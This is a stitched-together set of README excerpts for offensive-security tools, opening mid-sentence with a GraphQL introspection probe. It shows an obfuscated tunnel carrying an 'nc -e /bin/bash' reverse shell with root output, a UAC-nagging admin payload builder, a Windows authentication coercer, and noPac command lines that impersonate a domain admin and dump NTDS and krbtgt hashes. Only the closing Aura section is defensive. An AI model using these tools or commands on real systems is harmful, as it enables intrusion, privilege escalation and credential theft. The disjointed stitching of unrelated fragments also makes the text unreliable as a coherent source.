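The introspection-and-triage steps above can be sketched as a small probe. The HTTP handling uses only the standard library; the helper names and the "sensitive" word list are my own assumptions, not GraphCrawler's:

```python
import json
import urllib.request

INTROSPECTION = ("query { __schema { mutationType { name } "
                 "types { name fields { name } } } }")

def fetch_schema(endpoint: str, headers: dict = None):
    """POST a minimal introspection query; returns the __schema dict or None."""
    req = urllib.request.Request(
        endpoint,
        data=json.dumps({"query": INTROSPECTION}).encode(),
        headers={"Content-Type": "application/json", **(headers or {})},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp).get("data", {}).get("__schema")

def mutation_enabled(schema) -> bool:
    """Mutation support shows up as a non-null mutationType in the schema."""
    return bool(schema and schema.get("mutationType"))

SENSITIVE = {"users", "files", "tokens", "secrets"}

def sensitive_fields(schema) -> set:
    """Flag field names that hint at sensitive queries (users, files, ...)."""
    hits = set()
    for t in (schema or {}).get("types", []):
        for field in t.get("fields") or []:
            if field["name"].lower() in SENSITIVE:
                hits.add(field["name"])
    return hits
```

If fetch_schema returns None, introspection is disabled and that is the point where a tool like Clairvoyance takes over, rebuilding the schema from field suggestions instead.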
I hope this saves you as much time as it has saved me!
python graphCrawler.py -u https://test.com/graphql/api -o <fileName> -a "<headers>"
██████╗ ██████╗ █████╗ ██████╗ ██╗ ██╗ ██████╗██████╗ █████╗ ██╗ ██╗██╗ ███████╗██████╗
██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██║ ██║██╔════╝██╔══██╗██╔══██╗██║ ██║██║ ██╔════╝██╔══██╗
██║ ███╗██████╔╝███████║██████╔╝███████║██║ ██████╔╝███████║██║ █╗ ██║██║ █████╗ ██████╔╝
██║ ██║██╔══██╗██╔══██║██╔═══╝ ██╔══██║██║ ██╔══██╗██╔══██║██║███╗██║██║ ██╔══╝ ██╔══██╗
╚██████╔╝██║ ██║██║ ██║██║ ██║ ██║╚██████╗██║ ██║██║ ██║╚███╔███╔╝███████╗███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚══╝╚══╝ ╚══════╝╚══════╝╚═╝ ╚═╝
The output option is not required and by default it will output to schema.json
Wordlist from google-10000-english
Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption.
Obfuscation Modes
AES-GCM is enabled by default for each of the options above.
Usage
root@WOPR-KALI:/opt/gohide-dev# ./gohide -h
Usage of ./gohide:
-f string
listen fake server -r x.x.x.x:xxxx (ip/domain:port) (default "0.0.0.0:8081")
-key openssl passwd -1 -salt ok | md5sum
aes encryption secret: use '-k openssl passwd -1 -salt ok | md5sum' to derive key from password (default "5fe10ae58c5ad02a6113305f4e702d07")
-l string
listen port forward -l x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:8080")
-m string
obfuscation mode (AES encrypted by default): websocket-client, websocket-server, http-client, http-server, none (default "none")
-pem string
path to .pem for TLS encryption mode: default = use hardcoded key pair 'CN:target.com', none = plaintext mode (default "default")
-r string
forward to remote fake server -r x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:9999")
Scenario
Box A - Reverse Handler.
root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:8081 -l 127.0.0.1:8080 -r target.com:9091 -m websocket-client
Local Port Forward Listening: 127.0.0.1:8080
FakeSrv Listening: 0.0.0.0:8081
Box B - Target.
root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:9091 -l 127.0.0.1:9090 -r target.com:8081 -m websocket-server
Local Port Forward Listening: 127.0.0.1:9090
FakeSrv Listening: 0.0.0.0:9091
Note: /etc/hosts "127.0.0.1 target.com"
Box B - Netcat /bin/bash
root@WOPR-KALI:/var/tmp# nc -e /bin/bash 127.0.0.1 9090
Box A - Netcat client
root@WOPR-KALI:/opt/gohide# nc -v 127.0.0.1 8080
localhost [127.0.0.1] 8080 (http-alt) open
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux WOPR-KALI 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-1kali1 (2019-11-11) x86_64 GNU/Linux
netstat -pantwu
Active Internet connections (servers and established)
tcp 0 0 127.0.0.1:39684 127.0.0.1:8081 ESTABLISHED 14334/./gohide
Obfuscation Samples
websocket-client (Box A to Box B)
GET /news/api/latest HTTP/1.1
Host: cdn-tb0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: 6jZS+0Wg1IP3n33RievbomIuvh5ZdNMPjVowXm62
Sec-WebSocket-Version: 13
websocket-server (Box B to Box A)
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: URrP5l0Z3NIHXi+isjuIyTSKfoP60Vw5d2gqcmI=
http-client
GET /news/api/latest HTTP/1.1
Host: cdn-tbn0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://www.bbc.co.uk/
Connection: keep-alive
Cookie: Session=R7IJ8y/EBgCanTo6fc0fxhNVDA27PFXYberJNW29; Secure; HttpOnly
http-server
HTTP/2.0 200 OK
content-encoding: gzip
content-type: text/html; charset=utf-8
pragma: no-cache
server: nginx
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, must-revalidate
expires: Thu, 21 Nov 2019 01:07:15 GMT
date: Thu, 21 Nov 2019 01:07:15 GMT
content-length: 30330
vary: Accept-Encoding
X-Firefox-Spdy: h2
Set-Cookie: Session=gWMnQhh+1vkllaOxueOXx9/rLkpf3cmh5uUCmHhy; Secure; Path=/; HttpOnly
none
8JWxXufVora2FNa/8m2Vnub6oiA2raV4Q5tUELJA
Future
Enjoy~
ForceAdmin is a C# payload builder, creating infinite UAC pop-ups until the user allows the program to be run. The inputted commands are run via PowerShell calling cmd.exe and should use batch syntax. Why use it? Well, some users have UAC set to always notify, so UAC bypass techniques are not possible; however, this attack will force them to run as admin, bypassing these settings.
For building on your own, the following NuGet packages are needed:
- Fody: "Extensible tool for weaving .net assemblies."
- Costura.Fody: "Fody add-in for embedding references as resources."
- Microsoft.AspNet.WebApi.Client: "This package adds support for formatting and content negotiation to System.Net.Http. It includes support for JSON, XML, and form URL encoded data."
You can download the latest tarball by clicking here or the latest zipball by clicking here.
Download the project:
$ git clone https://github.com/catzsec/ForceAdmin.git
Enter the project folder
$ cd ForceAdmin
Run ForceAdmin:
$ dotnet run
Compile ForceAdmin:
$ dotnet publish -r win-x64 -c Release -o ./publish/
Any questions, errors or solutions, create an Issue in the Issues tab.
A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods. Notable options include:
- --analyze, which only lists the vulnerable protocols and functions listening, without performing a coerced authentication;
- --targets-file, to run the coercion against a list of targets;
- --webdav-host and --webdav-port, to specify the WebDAV listener to authenticate to.
$ ./Coercer.py -h
______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v1.6
\____/\____/\___/_/ \___/\___/_/ by @podalirius_
usage: Coercer.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [--hashes [LMHASH]:NTHASH] [--no-pass] [-v] [-a] [-k] [--dc-ip ip address] [-l LISTENER] [-wh WEBDAV_HOST] [-wp WEBDAV_PORT]
(-t TARGET | -f TARGETS_FILE) [--target-ip ip address]
Automatic windows authentication coercer over various RPC calls.
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to authenticate to the endpoint.
-p PASSWORD, --password PASSWORD
Password to authenticate to the endpoint. (if omitted, it will be asked unless -no-pass is specified)
-d DOMAIN, --domain DOMAIN
Windows domain name to authenticate to the endpoint.
--hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
--no-pass Don't ask for password (useful for -k)
-v, --verbose Verbose mode (default: False)
-a, --analyze Analyze mode (default: Attack mode)
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
command line
--dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-t TARGET, --target TARGET
IP address or hostname of the target machine
-f TARGETS_FILE, --targets-file TARGETS_FILE
IP address or hostname of the target machine
--target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-l LISTENER, --listener LISTENER
IP address or hostname of the listener machine
-wh WEBDAV_HOST, --webdav-host WEBDAV_HOST
WebDAV IP of the server to authenticate to.
-wp WEBDAV_PORT, --webdav-port WEBDAV_PORT
WebDAV port of the server to authenticate to.
In attack mode (without --analyze
option) you get the following output:
After all the RPC calls, you get plenty of authentications in Responder:
Pull requests are welcome. Feel free to open an issue if you want to add other features.
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Changed from sam-the-admin.
SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain
positional arguments:
[domain/]username[:password]
Account used to authenticate to DC.
optional arguments:
-h, --help show this help message and exit
--impersonate IMPERSONATE
target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified
-domain-netbios NETBIOSNAME
Domain NetBIOS name. Required if the DC has multiple domains.
-target-name NEWNAME Target computer name, if not specified, will be random generated.
-new-pass PASSWORD Add new computer password, if not specified, will be random generated.
-old-pass PASSWORD Target computer password, use if you know the password of the target you input with -target-name.
-old-hash LMHASH:NTHASH
Target computer hashes, use if you know the hash of the target you input with -target-name.
-debug Turn DEBUG output ON
-ts Adds timestamp to every logging output
-shell Drop a shell via smbexec
-no-add Forcibly change the password of the target computer.
-create-child Current account have permission to CreateChild.
-dump Dump hashes via secretsdump
-use-ldap Use LDAP instead of LDAPS
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-host hostname Hostname of the domain controller to use. If omitted, the domain part (FQDN) specified in the account parameter will be used
-dc-ip ip IP of the domain controller to use. Useful if you can't translate the FQDN specified in the account parameter.
execute options:
-port [destination port]
Destination port to connect to SMB Server
-mode {SERVER,SHARE} mode to use (default SHARE, SERVER needs root!)
-share SHARE share where the output will be grabbed from (default ADMIN$)
-shell-type {cmd,powershell}
choose a command processor for the semi-interactive shell
-codec CODEC Sets encoding used (codec) from the target's output (default "GBK").
-service-name service_name
The name of the service used to trigger the payload
dump options:
-just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
-user-status Display whether or not the user is disabled
-history Dump password history, and LSA secrets OldVal
-resumefile RESUMEFILE
resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state
-use-vss Use the VSS method instead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using -use-vss). Default: smbexec
Note: If -dc-host is not specified, the tool will automatically get the domain controller hostname; please select the hostname of the host specified by -dc-ip. If --impersonate is not specified, the tool will randomly choose a domain admin to exploit. LDAPS is used by default; if you get an SSL error, try adding -use-ldap.
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt
python scanner.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203
Find the computer that can be modified by the current user.
AdFind.exe -sc getacls -sddlfilter ;;"[WRT PROP]";;computer;domain\user -recmute
Exp: add -no-add
and target with -target-name
.
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -no-add -target-name DomainWin7$ -old-hash :2a99c4a3bd5d30fc94f22bf7403ceb1a -shell
Find CreateChild account, and use the account to exploit.
AdFind.exe -sc getacls -sddlfilter ;;"[CR CHILD]";;computer; -recmute
Exp: add -create-child
python noPac.py cgdomain.com/venus:'1qaz@WSX' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -create-child
Aura is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI.
Project goals:
Feature list:
Didn't find what you are looking for? Aura's architecture is based on a robust plugin system, where you can customize almost anything, from the set of data analyzers and transport protocols to custom output formats.
# Via pip:
pip install aura-security[full]
# or build from source/git
poetry install --no-dev -E full
Or just use a prebuilt docker image sourcecodeai/aura:dev
docker run -ti --rm sourcecodeai/aura:dev scan pypi://requests -v
Aura uses so-called URIs to identify the protocol and location to scan; if no protocol is used, the scan argument is treated as a path to a file or directory on the local system.
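That dispatch rule can be sketched with urllib.parse (the function name is illustrative, not Aura's API):

```python
from urllib.parse import urlparse

def resolve_scan_uri(argument: str):
    """Split a scan argument into (protocol, location); arguments without a
    scheme fall back to the local filesystem."""
    parsed = urlparse(argument)
    if parsed.scheme:
        return parsed.scheme, parsed.netloc or parsed.path
    return "local", argument
```

So "pypi://requests" routes to a PyPI fetcher with "requests" as the package, while a bare "./setup.py" is scanned straight off disk.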
Diff packages:
docker run -ti --rm sourcecodeai/aura:dev diff pypi://requests pypi://requests2
Find most popular typosquatted packages (you need to call aura update
to download the dataset first):
aura find-typosquatting --max-distance 2 --limit 10
While there are other tools with functionality that overlaps with Aura, such as Bandit, dlint, semgrep etc., the focus of these alternatives is different, which impacts their functionality and how they are used. These alternatives are mainly intended to be used like linters, integrated into IDEs and run frequently during development, which makes it important to minimize false positives and report findings with clear, actionable explanations in ideal cases.
Aura, on the other hand, reports on the **behavior of the code**, anomalies, and vulnerabilities with as much information as possible, at the cost of false positives. A lot of things reported by Aura are not necessarily actionable by a user, but they tell you a lot about the behavior of the code, such as performing network communication, accessing sensitive files, or using mechanisms associated with obfuscation, indicating possibly malicious code. By collecting this kind of data and aggregating it together, Aura can be compared in functionality to other security systems such as an antivirus, IDS, or firewall that are essentially doing the same analysis but on a different kind of data (network communication, running processes, etc.).
Here is a quick overview of differences between Aura and other similar linters and SAST tools:
# nosec
that will suppress the alert at that position

The Aura framework is licensed under the GPL-3.0. Datasets produced from global scans using Aura are released under the CC BY-NC 4.0 license. Use the following citation when using Aura or data produced by Aura in research:
@misc{Carnogursky2019thesis,
AUTHOR = "CARNOGURSKY, Martin",
TITLE = "Attacks on package managers [online]",
YEAR = "2019 [cit. 2020-11-02]",
TYPE = "Bachelor Thesis",
SCHOOL = "Masaryk University, Faculty of Informatics, Brno",
SUPERVISOR = "Vit Bukac",
URL = "Available at WWW <https://is.muni.cz/th/y41ft/>",
}